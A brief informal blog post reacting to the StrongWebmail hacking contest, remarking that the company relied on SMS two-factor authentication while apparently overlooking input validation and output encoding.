so strongwebmail got pwnt, and mb some hacker peeps are gettin paid... gratz all around!
it's interesting that strongwebmail focused so strongly on authentication (at least in the media reports i read prior to the pwnage)... they must've felt very secure that no one was going to find a way to read the PIN sent via SMS to a cell phone...
it's a beautiful hack (imo) to ignore that aspect entirely, sign up for an account, and subvert the system from the inside on the application layer.
seems like mb strongwebmail got some tunnel-vision about their uber 2-factor auth and forgot some simple stuff like input validation and output encoding ;)
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment